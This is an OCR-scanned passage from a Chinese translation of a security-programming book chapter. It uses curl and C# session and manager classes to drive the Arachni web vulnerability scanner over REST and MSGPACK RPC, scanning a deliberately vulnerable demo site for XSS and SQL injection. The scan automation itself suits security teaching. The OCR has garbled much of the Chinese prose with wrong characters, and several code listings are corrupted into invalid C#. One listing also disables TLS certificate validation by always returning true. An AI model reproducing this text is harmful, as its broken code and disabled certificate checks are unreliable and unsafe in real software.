清单 12-3: 使 用 curl 工 具 测 试 REST API 函 数 


$ curl -X POST --data '{"url":"http://demo.testfire.net/default.aspx"}'@ \ 
http://127.0.0.1:7331/scans 
"id":"b139f787f2d59800fc97c34c48863bed"}@ 
$ curl http://127.0.0.1:7331/scans/b139f787f2d59800fc97c34c48863bed®@ 
{"status":"done","busy" :false,"seed":"676fc9ded9dc44b8a32154d1458e20de", 
--SNip-- 


要 开始 一 次 扫描 ， 我 们 需要 做 的 就 是 使 用 请 求 主 体 中 的 一 些 JavaScript 对 象 符号 (JSON) 来 构造 一 个 POST 请 求 @@。 我 们 使 
用 curl 工 具 的 “--data” 参 数 来 传递 JJON 格 式 的 待 扫 摘 URL 地 址 ， 并 将 其 友 达 到 “/scans” 闯 点 ， 从 而 开始 一 次 新 的 Arachni 软 
件 扫 摘 过 程 。HTTP 啊 应 包 @ 中 将 返回 新 扫 摘 过 程 的 ID 号 。 在 创建 扫 摘 过 程 己 后， 我们 还 可 以 通过 简单 的 HTTP GET 请 求 包 (curl 
工具 的 默认 请 求 包 类 型 ) @ 来 获取 当前 扫 摘 状态 和 结果 。 我 们 通过 访问 Arachni 软 件 所 监听 的 IP 地 址 和 端口 ， 并 附加 上 为 针 
对 “/scans/”URL 地 址 端点 的 scans 请 求 创建 扫 拉 过 程 时 所 获取 的 ID 号 ， 从 而 实现 上 述 功能 。 在 扫描 过 程 结束 之 后 ， 扫 摘 日 志 
将 包含 扫描 友 现 的 所 有 漏洞 ， 比 如 XSS、SQL 注 入 ， 以 及 其 他 常见 的 Web 应 用 程序 漏洞 。 


在 完成 以 上 过 程 之 后 ， 我 们 已 经 对 REST API 函 数 的 工作 过 程 有 了 一 定 了 解 ， 接 下 来 我 们 将 编写 代码 ， 实 现 使 用 API 阔 数 对 任 
何 已 知 地 址 的 站 点 进行 扫描 。 


12.2.1 创建 ArachniHTTPSession 类 


与 前 几 章 的 做 法 一 样 ， 我 们 将 实现 一 个 会 话 类 和 一 个 管理 类 来 与 Arachni 软 件 的 API 遂 数 进行 交互 。 目 前 来 看 ， 这 些 类 相对 
比较 简单 ， 但 对 它们 进行 详细 分 析 将 在 AP1 消 数 需要 认证 或 其 他 额外 步骤 的 情况 下 提供 更 好 的 灵活 性 。 清 单 12-4 展 示 了 
ArachniHTTPSession 类 的 县 体 细节 。 


清单 12-4: ArachniHTTPSession 类 


public class ArachniHTTPSession 


{ 
public 


{ 


this 
} 
public 
public 


this. 


public 
{ 


@ArachniHTTPSession(string host, int port) 


Host = host; 


.Port = port,; 


string Host { get; set; } 
int Port { get; set; } 


JObject @ExecuteRequest(string method, string uri, JObject data = null) 


string url = "http://" + this.Host + ":" + this.Port.ToString() + uri; 
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(ur]); 
request.Method = method ; 


if (data != null) 


| 


string dataString = data.ToString(); 
byte[ | dataBytes = System.Text.Encoding.UTF8.GetBytes(dataString); 


request.ContentType = “application/json’; 
request.ContentLength = dataBytes.Length ; 


request.GetRequestStream().Write(dataBytes, 0, dataBytes.Length); 


} 


string resp = string.Empty; 
Using (StreamReader reader = new StreamReader(request.GetResponse().GetResponseStream())) 
resp = reader.ReadToEnd(); 


return JObject.Parse(resp); 


} 
} 


至 此 ，ArachniHTTPSession 类 对 于 读者 来 说 应 该 算是 非常 简单 易 懂 了 ， 因 此 我 们 不 再 对 代码 进行 深入 讲解 。 我 们 创建 一 个 
构造 器 @@ 来 接收 两 个 参数 ， 即 要 连接 的 主机 和 端口 ， 然 后 使 用 这 两 个 参数 为 对 应 的 属性 赋值 。 之 后 ， 创 建 一 个 方法 来 基于 传递 给 
万 法 的 参数 执行 一 次 通用 的 HTTP 请 求 @。ExecuteRequest () 方法 将 返回 一 个 JObject 对 象 ， 其 中 包含 给 定 API| 亲 点 所 返回 的 
数据 。 因 为 ExecuteRequest () 方法 可 被 用 于 构造 对 Arachni 软 件 的 任意 API 函 数 调用 ， 所 以 唯一 需要 注意 的 是 ， 响 应 数据 应 该 
是 能 够 由 服务 器 响应 解析 为 JObject 对 象 的 JSON 格 式 。 


12.2.2 ”创建 ArachniHTTPManager 类 


ArachniHTTPManager 类 似乎 也 很 简单 ， 具 体 代 码 如 清单 12-5 所 示 。 


清单 12-5: ArachniHTTPManager 类 


public class ArachniHTTPManager 
| 


ArachniHTTPSession session; 
public @ArachniHTTPManager(ArachniHTTPSession session) 


{ 


session = session,; 


} 
public JObject @StartScan(string url, JObject options = ©@null) 


t 
JObject data = new JObject(); 


data[ "url"|] = url; 
data.Merge(options); 


return session.ExecuteRequest("POST", "/scans", data); 


} 


public JObject @GetScanStatus(Guid id) 
{ 


return session.ExecuteRequest("GET", "/scans/" + id.ToString ("N")); 


} 
} 


ArachniHTTPManager 类 的 构造 器 @ 只 需要 一 个 参数 ， 即 用 于 执行 请 求 的 会 话 ， 之 后 用 该 会 话 参 数 为 本 地 私有 变量 赋值 以 
备 后 用 。 然 后 ， 我 们 创建 了 两 个 方法 : StartScan () @ 和 GetScanStatus () @; 这 些 方法 就 是 构造 一 个 小 工具 对 一 个 URL 地 
址 进行 扫 摘 和 报告 所 需要 完成 的 全 部 工作 。 


StartScan () 方法 需要 两 个 参数 ， 其 中 一 个 可 选择 默认 值 为 空 @9。 默 认 情况 下 ， 你 可 以 只 为 StartScan () 方法 指定 一 个 
URL 地 址 而 不 设置 扫描 选项 ， 这 时 Arachni 软 件 将 简单 地 对 站 点 进行 代 取 而 不 会 进行 漏洞 检测 ; 这 个 特性 能 够 让 用 户 了 解 Web 应 
用 程序 有 多 少 接触 途径 ( 即 需 要 测试 的 页 面 和 表单 有 多 少 ) 。 然 而 事实 上 ， 我 们 想 要 指定 额外 的 参数 来 调整 Arachni 软 件 的 扫描 
过 程 ， 以 便 能 够 进行 扫描 并 将 这 些 选 项 整合 到 JObject 对 象 数据 之 中 ， 之 后 我 们 使 用 POST 命 令 将 扫描 过 程 的 细节 内 容 传 递 给 
Arachni 软 件 的 API 函 数 ， 并 返回 API 函 数 所 反馈 的 JSJON 格 式 数据 。GetScanstatus () 方法 通过 在 传递 给 API 函 数 的 URL 地 址 中 
使 用 传 入 方法 的 扫描 过 程 ID 号 ， 来 生成 一 个 简单 的 GET 请 求 ， 之 后 向 调用 者 返回 JSJON 格 式 的 响应 数据 。 


12.3 ”整合 会 证 和 官 理 嚣 类 


利用 上 述 实现 的 两 个 类 ， 我 们 开始 进行 扫 摘 ， 具 体 代码 如 清单 12-6 所 示 。 


清单 12-6: 使 用 ArachniHTTPSession 类 和 ArachniHTTPManager 类 来 驱动 Arachni 软 件 运 行 


public static void Main(string[] args ) 


ArachniHTTPSession session = new ArachniHTTPSession("127.0.0.1", 7331); 
ArachniHTTPManager manager = new ArachniHTTPManager(session); 


@J]JObject scan0ptions = new JObject(); 
scanOptions["checks"| = new JArray() { "xss*", "sql*" }; 
scanOptions["audit"| = new JObject(); 
scanOptions["audit"|["elements"| = new JArray() { "links", "forms” }; 


string Url = “http://demo.testfire.net/default.aspx'; 
JObject scanId = manager.@StartScan(url, scanOptions); 
Guid id = Guid.Parse(scanId["id"].ToString()); 

JObject scan = manager.@GetScanStatus(id); 


while (scan["status"|.ToString() != "done") 
{ 


Console.WritelLine("Sleeping a bit until scan is finished"); 
System.Threading.Thread.Sleep(10000); 
scan = manager.GetScanStatus(id); 


} 


@Console.WritelLine(scan.ToString()); 
} 


在 使 用 示例 参数 为 会 话 类 和 管理 类 赋值 之 后 ， 我 们 创建 了 一 个 新 的 JObject 对 象 @@ 来 存储 我 们 的 扫描 选项 ;这 些 选 项 直接 对 
应 于 运行 “arachnid-help” 命 令 时 从 Arachni 软 件 工具 中 所 看 到 的 命令 行 选项 (有 很 多 ) 。 通 过 将 他 有 值 “xss*” 和 “sql*” 的 
JArray 对 象 放 入 “checks” 选 项 关键 字 中 ， 我 们 将 Arachni 软 件 设置 为 针对 网 站 运行 XSS 和 和 SQL 注入 检测 ， 而 不 是 简单 地 有 他 取 应 
用 程序 并 找到 所 有 可 访问 的 页 面 和 表单 。 紧 随 其 后 的 “audit” 选 项 将 Arachni 软 件 设置 为 对 所 发 现 的 链接 和 任何 HTML 表 单 进行 
审计 ， 检 查 我 们 所 设置 的 其 运行 检查 的 内 容 。 


在 设置 好 扫 摘 选项 之 后 ， 通 过 调用 startscan () 方法 @ 来 开始 扫 摘 过 程 ， 并 将 测试 URL 地 址 作为 参数 传递 给 访 方 法 。 利 用 
StartScan () 方法 所 返回 的 ID 号 ,我 们 可 以 通过 GetScanStatus () 方法 @ 来 获取 当前 扫描 状态 ， 之 后 循环 每 隔 一 秒 检查 新 的 
扫 摘 状态 ， 直 到 扫 摘 过 程 结束 。 结 束 之 后 ， 我 们 将 JSON 格 式 的 扫 摘 结果 打印 到 屏幕 上 @。 


Arachni 软 件 的 REST API 消 数 对 于 大 部 分 安全 工程 师 或 者 业余 爱好 者 来 说 是 简单 易 用 的 ， 因 为 它 可 以 通过 基本 的 命令 行 工具 
来 使 用 。 它 还 可 以 使 用 大 部 分 通用 的 C# 库 轻松 实现 自动 化 ， 因 此 它 可 以 作为 安全 软件 开发 生命 周期 (SDLC) 的 简单 入 门 ， 或 者 
对 你 上 自己 开 友 的 网 站 进行 每 周 / 每 月 一 次 扫描 的 通用 上 自动 化 工具 。 你 还 可 以 尝试 使 用 你 的 自动 化 程序 对 书 中 之 前 所 提 到 的 一 些 市 
有 已 知 漏洞 的 Web 应 用 程序 (比如 Badstore) 运行 Arachni 软 件 进行 扫 摘 。 既 然 我 们 已 经 接触 到 了 Arachni 软 件 API 函 数 ， 那 么 
接 下 来 我 们 要 讨论 如 何 目 动 运行 它 的 RPC 服 务 。 


12.4 ”Arachni 软 件 的 RPC 服 务 


Arachni 软 件 的 RPC 协 议 比 API 消 数 更 高 级 复杂 一 些 ， 但 它 的 功能 也 更 强大 。 尽 省 和 Metasploit 平 台 的 RPC 服 务 一 样 也 是 由 
MSGPACK 提 供 文 持 ， 但 Arachni 软 件 的 协议 有 一 点 不 同 : 有 时 数据 会 以 Gzip 格式 进行 压缩 ， 并 且 只 能 人 在 一 般 的 TCP 套 接 字 上 进 
行 通信 ， 而 不 能 使 用 HTTP 协 议 。 这 种 复杂 性 有 其 优点 : 在 没有 HTTP 开 销 的 情况 下 RPC 服 务 将 非常 快速 ， 并 且 相 比 于 API 函 数 ， 
它 能 够 为 你 提供 更 强 的 扫 摘 器 管理 能 力 ， 包 括 按 照 意愿 对 扫 摘 器 进行 加 速 和 减速 的 能 力 ， 以 及 创建 分 布 式 扫 摘 集群 ， 从 而 使 得 


Arachni 软 件 集群 能 够 在 多 个 实例 之 间 平 衡 扫描 过 程 。 长 话 短 襄 ，RPC 服 务 很 用， 但 我 们 应 该 把 开发 天 注 点 和 技术 广 持 更 多 地 
放 企 REST API 消 数 上 ， 因 为 它 对 于 大 部 分 开 友 者 更 容易 接受 。 


12.4.1 ”手动 运行 RPC 服 务 


我 们 使 用 简单 的 脚本 “arachni rpcd” 来 启动 一 个 RPC 服 务 监听 器 ， 如 清单 12-7 所 示 。 
清单 12-7: 运行 Arachni 软 件 RPC 服 务 器 


$ arachni rpcd 
Arachni - Web Application Security Scanner Framework v2.0dev 
Author: Tasos “Zapotek Laskos <tasos.laskos@arachni-scanner.com> 


(With the support of the community and the Arachni Team.) 


Website: http://arachni-scanner.com 
Documentation: http://arachni-scanner.com/wiki 


I,[2016-01-16T18:23:29.000746 #18862| INFO - System: RPC Server started. 
I,[2016-01-16T18:23:29.000834 #18862] INFO - System: Listening on @127.0.0.1:7331 


现在 我 们 使 用 Arachni 软 件 自 市 的 另 一 个 名 为 “arachni_rpc” 的 脚本 来 测试 监听 器 。 注 意 ， 正 在 监听 的 RPC 服 务 器 的 输出 信 
息 中 所 包含 的 调度 程序 URL 地 址 @)， 我 们 随后 将 用 到 它 。Arachni 软 件 自 带 的 “arachni rpc” 脚本 能 够 让 你 在 命令 行 中 与 RPC 服 
I 人 入 


务 监听 器 进行 交互 。 在 启动 “arachni rpcd” 监听 器 之 后 ， 打 开 另 一 个 终端 并 转 到 Arachni 软 件 工程 的 根 目 录 ; 之 后 ， 使 
用 “arachni_rpc” 脚 本 开始 一 次 扫 拉 过 程 ， 具 体 命令 如 清单 12-8 所 示 。 


清单 12-8: 通过 RPC 服 务 对 相同 的 故意 设 有 漏洞 的 网 站 运行 Arachni 软 件 进行 一 次 扫 摘 


$ arachni rpc --dispatcher-url 127.0.0.1:7331 \ 
"http://demo.testfire.net/default.aspx" 


这 条 命令 将 驱动 Arachni 软 件 使 用 MSGPACK RPC， 正 如 我 们 马上 要 用 C# 代 码 来 做 的 事情 一 样 。 如 果 运 行 成 功 ， 你 将 看 到 
一 个 非常 漂亮 的 基于 文本 的 Ul 界 面 ， 为 你 不 断 更 新 当前 扫 摘 过 程 的 状态 ， 并 且 在 结尾 处 会 有 一 份 非常 整齐 美观 的 报告 ， 如 清单 
12-9 所 示 。 


清单 12-9: “arachni_rpc” 命 令 行 扫描 UI 界面 信息 


Arachni - Web Application Security Scanner Framework v2.0dev 
Author: Tasos “Zapotek ”Laskos <tasos.laskos@arachni-scanner.com> 


(With the support of the community and the Arachni Team.) 


Website: http://arachni-scanner.com 
Documentation: http://arachni-scanner.com/wiki 
[~|] 10 issues have been detected. 


[+] 1 | Cross-Site Scripting (XSS) in script context at 
http://demo.testfire.net/search.aspx in form input txtSearch using GET. 

[+] 2 | Cross-Site Scripting (XSS) at http://demo.testfire.net/search.aspx 
in form input ‘txtSearch using GET. 


[+] 3 | Common directory at http://demo.testfire.net/PR/ in server. 

[+] 4 | Backup file at http://demo.testfire.net/default.exe in server. 

[+] 5 | Missing 'X-Frame-Options' header at http://demo.testfire.net/default.aspx in server. 
[+] 6 | Common administration interface at http://demo.testfire.net/admin.aspx in server. 
[+] 7 | Common administration interface at http://demo.testfire.net/admin.htm in server. 

[+] 8 | Interesting response at http://demo.testfire.net/default.aspx in server. 


[+] 9 | HttpOnly cookie at http://demo.testfire.net/default.aspx in cookie with inputs 
“amSessionId . 
[+] 10 | Allowed HTTP methods at http://demo.testfire.net/default.aspx in server. 


[~] Status: Scanning 
[~] Discovered 3 pages thus far. 


[~] Sent 1251 requests. 

[~] Received and analyzed 1248 responses. 

[~] In 00:00:45 

[~] Average: 39.3732270014467 requests/second. 


] Currently auditing http://demo.testfire.net/default.aspx 
] Burst response time sum 72.511066 seconds 
| Burst response count total 97 
“| Burst average response time 0.747536762886598 seconds 
] Burst average 20.086991167522193 requests/second 
] Timed-out requests 0 
] Original max concurrency 20 
] Throttled max concurrency 20 


| 


[~] ('Ctrl+C' aborts the scan and retrieves the report) 


12.4.2 ArachniRPCSession 类 


要 使 用 RPC 服 务 框架 和 (C 芒 各 言 来 运行 扫 摘 过 程 ， 我 们 将 再 次 实现 会 话 /管理 器 模式 ， 并 从 Arachni 软 件 的 RPC 服 务 会 话 类 开 
始 着 手 。 通 过 RPC 服 务 框架 ， 你 可 以 更 深入 地 了 解 实际 的 Arachni 软 件 架 构 ， 因 为 你 需要 在 更 精细 的 粒度 层面 上 处 理 调度 程序 和 
实例 。 你 首次 连接 RPC 服 务 框 染 时 ， 实 际 上 是 与 调度 程序 连接 ; 你 可 以 与 这 个 调度 程序 进行 交互 来 创建 和 管理 进行 实际 扫 摘 工作 
的 实例 ， 但 是 这 尝 监听 闯 口 不 同 于 调度 程序 的 扫 摘 实 例会 动态 结束 。 为 了 给 调度 程序 和 实例 同时 提供 一 个 易 用 的 接口 ， 我 们 可 以 
创建 一 个 会 话 构造 器 来 稍微 掩 兰 一 下 这 些 差别 ， 具 体 代 码 如 清单 12-10 所 示 。 


清单 12-10: ArachniRPCSession 类 构造 器 的 前 半 部 分 代码 


public class ArachniRPCSession : IDisposable 


L 


SslStream stream = null; 
public ArachniRPCSession(@string host, int port, 

bool @initiateInstance = false) 
{ 


this.Host = host; 
tnls .Port = port; 


@CcetStream(host, port); 
this.IsInstanceStream = false; 


if (initiateInstance) 


{ 
this.InstanceName = @Guid.NewGuid().ToString(); 


MessagePackObjectDictionary resp = 
this.ExecuteCommand("dispatcher.dispatch"®, 
new object[| { this.InstanceName }).AsDictionary(); 


构造 器 需要 三 个 参数 @: 前 两 个 〈 即 要 连接 的 主机 及 其 闯 口 ) 是 必需 的 ; 第 三 个 是 可 选 的 @ (默认 值 为 “false”) ， 编 程 
人 员 可 以 使 用 该 参数 来 目 动 创建 并 连接 一 个 新 的 扫 摘 实例， 而 不 需要 通过 调度 程序 来 手动 创建 新 实例 。 


在 使 用 传递 给 构造 器 的 前 两 个 参数 分 别 为 “Host” 和 “Port” 属 性 赋值 之 后 ， 我 们 使 用 GetStream () 函数 @ 连 接 调度 程 
序 。 如 果 第 三 个 参数 “instantiatelnstance” 为 “true” (默认 为 “false”) ， 我 们 将 使 用 一 个 新 的 “Guid” 值 @ 来 为 想 要 调 
上 度 的 实例 创建 一 个 唯一 名 称 ， 然 后 运行 RPC 服 务 合 令 “dispatcher.dispatch”@ 来 创建 一 个 新 的 扫 摘 器 实例 ， 结 果 将 返回 一 个 
新 的 端口 (如果 是 一 个 扫描 器 实例 集群 的 话 ， 也 可 能 返回 新 的 主机 ) 。 清 单 12-11 所 示 的 是 构造 器 的 剩余 部 分 代码 。 


清单 12-11: ArachniRPCSession 类 构造 器 的 剩余 部 分 代码 以 及 类 属性 


this.InstanceHost = url[0]; 
this.InstancePort = int.Parse(url[1|); 
this.Token = @resp["token" | .AsString(); 


@CcetStream(this.InstanceHost, this.InstancePort); 


bool aliveResp = this.@ExecuteCommand("service.alive?", new object[] { }, 
this.Token).AsBoolean(); 


this.IsInstanceStream = aliveResp; 


} 
} 


@public string Host { get; set; } 
public int Port { get; set; } 
public string Token { get; set; } 
public bool IsInstanceStream { get; set; } 
public string InstanceHost { get; set; } 
public int InstancePort { get; set; } 
public string InstanceName { get; set; } 


中 处 将 扫描 器 实例 的 URL 地 址 (比如 ，127.0.0.1: 7331) 分 成 iP 地址 和 端口 (分 别 是 127.0.0.1 和 7331) 两 部 分 。 在 获取 实 


例 主 机 和 问 口 之 后 将 使 用 这 些 信 息 来 开始 实际 扫 拉 过程， 首先 用 这 些 值 分 别 为 “InstanceHost” 和 “InstancePort” 属 性 赋 
值 。 我 们 还 要 保存 调度 程序 所 返回 的 认证 令 牌 @， 这 样 随后 就 可 以 对 扫描 器 实例 进行 需要 认证 的 RPC 服 务 调用 。 这 个 认证 令 牌 是 
在 调度 新 实例 时 由 Arachni 软 件 的 RPC 服 务 自动 生成 的 ， 因 此 只 能 通过 令 牌 使 用 新 扫 拉 器。 


使 用 GetStream () 函数 @ 连 接 扫 摘 器 实例 ， 该 函数 能 够 直接 访问 扫 摘 过程 实 例 。 如 果 连 接 成 功 并 且 扫 拉 过 程 实 例 人 存活 
国 ， 我 们 融 将 “lslnstancestream” 属性 赋值 为 “true” ， 通 过 该 属性 我 们 能 够 获 和 烛 ， 之 后 当 我 们 实现 ArachniRPCManager 类 
时 ， 正 在 驱动 一 个 调度 程序 还 是 一 个 扫描 过 程 实例 (这 决定 了 我 们 对 Arachni 软 件 能 够 进行 的 RPC 服 务 调 用 类 型 ， 比 如 创建 一 个 
扫 摘 器 或 者 执行 一 次 扫 摘 ) 。 崇 随 构造 器 之 后 的 是 为 会 话 类 所 定义 的 若干 属性 ， 它 们 都 被 用 于 构造 器 之 中 。 


12.4.3” ExecuteCommand () 的 支持 方法 


在 实现 ExecuteCommand () 方法 之 前 ,需要 实现 它 的 一 些 支 持 方法 。 就 快 大 功 告 成 了 ! 完成 ArachniRPCSession 类 所 需 
的 方法 如 清单 12-12 所 示 。 


清单 12-12: ArachniRPCSession 类 的 支持 方法 


public byte[] DecompressData(byte[ |] inData) 
| 


using (MemoryStream outMemoryStream = new MemoryStream()) 
using (@7ZOutputStream outZzStream = new ZOutputStream(outMemoryStream)) 


outZzStream.Write(inData, 0, inData.Length); 
return outMemoryStream.ToArray(); 


} 
} 
} 


private byte[] @ReadMessage(SslStream sslStream) 


{ 
byte[] sizeBytes = new byte[4]; 
sslStream.Read(sizeBytes, 0, sizeBytes.Length); 


if (BitConverter.IsLittleEndian) 
Array.Reverse(sizeBytes); 


uint size = BitConverter.®@ToUInt32(sizeBytes, 0); 


bytel | buffer = new bytelslzej|; 
sslStream.Read(buffer, 0, buffer.Length); 


return buffer; 


} 


private void @GCetStream(string host, int port) 


{ 
TcpClient client = new TcpClient(host, port); 


stream = new SslStream(client.GetStream(), false, 
new RemoteCertificateValidationCallback(@ValidateServerCertificate), 
(sender, targetHost, localCertificates, 
remoteCertificate, acceptablelssuers) 
=> null); 


stream.AuthenticateAsClient("arachni", null, SslProtocols.Tls, false); 


} 


private bool ValidateServerCertificate(object sender, X509Certificate certificate, 
X509Chain chain, SslPolicyErrors sslPolicyErrors) 
{ 


return true; 


} 


public void @Disposel() 
{ 


if (this.IsInstanceStream && stream != null) 
this.ExecuteCommand(@"service.shutdown", new object[|] { }, this.Token); 


if ( stream != null) 
_stream.Dispose(); 


_stream = null; 


} 


RPC 服 务 会 话 类 的 大 部 分 支持 方法 都 相对 比较 简单 。DecompressData () 方法 利用 NuGet 工 具 中 名 
为 “ZOutputStream”Q@ 的 可 用 zlib 库 ,创建 一 个 新 的 输出 流 ;， 这 将 以 字 书 数组 的 形式 返回 解压 数据 。 在 ReadMessage () 万 
法 @ 中 ， 我 们 从 流 中 读 取 前 4 个 字 节 ， 然 后 将 其 转化 为 32 比 特 的 无 符号 整 型 数值 @)， 该 值 代表 了 数据 流 剩余 部 分 的 长 度 。 在 获取 
长 度 之 后 ， 我 们 从 流 中 读 取 数据 的 剩余 部 分 ， 并 以 字 节 数组 的 形式 返回 所 读 取 的 数据 。 


GetStream () 方法 @ 与 我 们 在 OpenVAS 库 中 用 于 创建 网 络 流 的 代码 十 分 相似 。 我 们 创建 一 个 新 的 TCPClient 对 象 ， 并 将 
该 流 封装 为 一 个 SslStream 对 象 。 我 们 使 用 ValidateServerCertificate () 方法 @ 通 过 始终 返回 “true” 来 信任 任何 SSL 证 书 ; 这 
使 得 我 们 可 以 使 用 自 签名 证 书 连接 RPC 服 务实 例 。 最 后 ，IDisposable 接 口 要 求 ArachniRPCSession 类 必须 实现 Dispose () 方 
法 ©@@。 如 果 我 们 正在 驱动 运行 的 是 一 个 扫描 过 程 实例 而 不 是 一 个 调度 程序 (ArachniRPCSession 类 创建 时 在 构造 器 中 设置 ) ， 
我 们 向 实例 发 送 一 条 “shutdown” 命 令 来 清理 扫描 过 程 实例 ， 同 时 让 调度 程序 保持 运行 。 


12.4.4 ”ExecuteCommand () 方法 


清单 12-13 所 示 的 ExecuteCommand () 方法 ， 将 发 送 命令 以 及 从 Arachni 软 件 的 RPC 服 务 辛 接收 响应 结果 所 需 的 所 有 功能 
封 六 为 一 体 。 


清单 12-13: ArachniRPCSession 类 ExecuteCommand () 方法 的 前 半 部 分 


public MessagePackObject @ExecuteCommand(string command，object[ | args， 
string token = null) 
{ 


@Dictionary<string, object> = new Dictionary<string, object>(); 
@message[ "message" | = command ; 
message[ "args" | = args; 


if (token != null) 
@message[ token "| = token,; 


byte[ | packed ; 
using (MemoryStream stream = new @MemoryStream()) 


Packer packer = Packer.Create(stream); 
packer.PackMap(message); 
packed = stream.ToArray(); 


ExecuteCommand () 方法 @ 需 要 三 个 参数 : 要 执行 的 命令 ， 包 含 命令 所 用 参数 的 对 象 ， 以 及 一 个 令 牌 (可 选 参数 ， 提 供 
认证 令 牌 的 情况 下 用 到 ) ; 之 后 的 ArachniRPCManager 类 将 主要 用 到 该 方法 。 在 方法 的 开头 ,我 们 首先 创建 一 个 名 
为 “request” 的 新 字典 变量 来 保存 命令 数据 (包括 要 执行 的 命令 ， 以 及 RPC 服 务 命令 所 需 的 参数 ) @。 然 后 ， 我 们 使 用 传递 给 
ExecuteCommand () 方法 的 第 一 个 参数 ( 即 要 执行 的 命令 ) 为 字典 中 的 “message” 键 值 @ 赋 值 ， 同 时 使 用 传递 给 方法 的 第 
二 个 参数 ( 即 待 执行 命令 的 选项 ) 为 字典 中 的 “args” 键 值 赋 值 。 当 我 们 友 送 消息 时 ，Arachni 软 件 将 检查 这 些 键 值 ， 使 用 给 定 
的 参数 来 运行 RPC 服 务 命令 ， 然 后 返回 响应 结果 。 如 果 可 选 的 第 三 个 参数 不 为 空 ， 则 使 用 传递 给 方法 的 认证 令 牌 为 “token” 键 
值 四 赋值 。 这 三 个 字典 键 值 (“message” “args” 和 “token”) 就 是 向 Arachni 软 件 发 送 序 列 化 数据 时 它 将 检查 的 全 部 内 


[zr 


容 。 

在 使 用 想 要 发 送 给 Arachni 软 件 的 信息 构建 “request” 字 上 暴 变 量 之 后 ， 我 们 创建 一 个 新 的 MemoryStream () 对 象 @， 并 
使 用 Packer 类 (与 第 11 章 进行 Metasploit 平 台 绑 定时 所 用 到 的 一 样 ) 来 将 “request” 字 上 暴 变 量 序列 化 为 一 个 字 节 数组 。 至 此 我 
们 已 经 准备 好 了 用 于 发 送 到 Arachni 软 件 来 执行 一 条 RPC 服 务 命令 的 数据 ， 接 下 来 需要 发 送 数 据 并 读 取 Arachni 软 件 的 响应 执行 
结果 。 这 些 操作 将 在 ExecuteCommand () 方法 的 后 半 部 分 实现 ， 如 清单 12-14 所 示 。 


清单 12-14: ArachniRPCSession 类 ExecuteCommand () 方法 的 后 半 部 分 


byte[ ] packedLength = @BitConverter.GetBytes(packed.Length); 


if (BitConverter.IsLittleEndian) 
Array.Reverse(packedLength); 


@ stream.Write(packedLength); 
© _stream.Write(packed); 


byte[ |] respBytes = @ReadMessage( streanm); 


MessagePackObjectDictionary resp = null; 
try 


resp = Unpacking.UnpackObject(respBytes).Value.AsDictionary(); 


} 
©@catch 


{ 


byte[] decompressed = DecompressData(respBytes); 
resp = Unpacking.UnpackObject(decompressed).Value.AsDictionary(); 


} 


return resp.ContainsKkey("obj") ? resp["obj"] : resp[ “exception ”|] ; 


} 


由 于 Arachni 软 件 的 RPC 服 务 流 使 用 简单 协议 进行 通信 ， 我 们 可 以 简单 地 将 MSGPACK 数 据 友 送 给 Arachni 软 件 ， 但 是 在 此 
过 程 中 需要 友 送 两 部 分 信息 ， 而 不仅 仅 是 MSGPACK 数 据 。 在 MSGPACK 数 据 之 前 ， 首 先 以 4 字 忆 整 型 格式 向 Arachni 软 件 友 迷 
MSGPACK 数 据 的 大 小 。 这 个 整 型 数据 代表 每 个 消息 中 序列 化 数据 的 长 度 ， 用 于 通知 接收 方 主机 需要 从 流 中 读 取 多 少 来 作为 消息 
分 卢 的 组 成 部 分 。 为 了 获取 数据 的 长 度 字 五 ， 我 们 使 用 BitConverterGetBytes () 万 法 @ 来 得 到 4 字 万 大 小 的 数组 。 数 据 长 度 以 
及 数据 本 身 需 要 以 特定 顺序 写 入 Arachni 软 件 的 流 中 。 我 们 首先 回流 中 写 入 代表 数据 长 度 的 4 字 节 @， 然 后 向 流 中 写 入 整个 序列 
化 消 轧 @)。 


接 下 来 ， 我 们 需要 从 Arachni 软 件 读 取 响 应 信息 ， 并 将 其 返回 给 调用 方 。 利 用 ReadMessage () 方法 @， 我 们 从 响应 信息 
中 提取 消息 的 原始 字 节 ， 并 滨 试 在 一 个 “try/catch” 代 码 块 中 将 消息 解析 为 MessagePackObjectDictionary 格 式 。 如 果 首 次 尝 
试 不 成 功 ， 则 意味 着 数据 使 用 Gzip 格式 进行 了 压缩 ， 因 此 转 入 “catch” 代码 块 @@; 我 们 将 数据 解压 ， 然 后 将 解压 后 的 字 节 解析 
为 一 个 MessagePackObjectDictionary 格 式 对 象 。 最 后 ， 返 回来 自 服务 器 的 整个 响应 信息 ， 或 者 当 错 误 友 生 时 返回 一 个 异常 。 


12.4.5 ArachniRPCManager 类 


与 ArachniRPCSession 类 相 比 ，ArachniRPCManager 类 非常 简单 ， 具 体 代码 如 清单 12-15 所 示 。 


清单 12-15: ArachniRPCManager 类 


public class ArachniRPCManager : IDisposable 
{ 
ArachniRPCSession session; 
public ArachniRPCManager( @ArachniRPCSession session) 
{ 
if (lsession.IsInstanceStream) 
throw new Exception("Session must be using an instance stream"); 


_session = session; 


} 


public MessagePackObject @StartScan(string url, string checks = "*") 
{ 
Dictionary<string, object>args = new Dictionary<string, object>(); 
args[ "url"] = url; 
args[ "checks"| = checks; 
args["audit"] = new Dictionary<string, object>(); 
((Dictionary<string, object>)args["audit"|)["elements"| = new object[ | { "links", "forms” }; 


return session.ExecuteCommand(@"service.scan", new object[] { args }, session.Token); 


} 

public MessagePackObject @GetProgress(List<uint> digests = null) 

{ 
Dictionary<string, object>args = new Dictionary<string, object>(); 
args[ "with"] = "issues"; 


if (digests != null) 


args["without"] = new Dictionary<string, object>(); 
((Dictionary<string, object>)args["without"])["issues"] = digests.ToArray(); 


return session.@ExecuteCommand("service.progress", new object[] { args }, session.Token); 


} 

public MessagePackObject ©@IsBusy() 

| return session.ExecuteCommand("service.busy?", new object[] { }, session.Token); 
} 

public void Dispose() 

Osession Disposel) 


} 


首先 ，ArachniRPCManager 类 构造 器 以 一 个 ArachniRPCSession 类 对 象 @ 作 为 唯一 参数 。 我 们 的 管理 类 将 仅 针 对 一 个 扫 摘 
过 程 实例 实现 方法 ， 而 不 考虑 调度 程序 的 情况 ， 因 此 如 果 传 入 的 会 话 不 是 扫描 过 程 实例 ， 我 们 将 抛 出 一 个 异常 ; 否则 ， 我 们 使 用 
该 会 话 为 本 地 类 变量 赋值 ， 以 用 于 后 续 的 方法 。 


在 ArachniRPCManager 类 中 创建 的 第 一 个 方法 是 StartScan () 方法 @， 它 需要 两 个 参数 。 所 需 的 第 一 个 参数 是 Arachni 将 
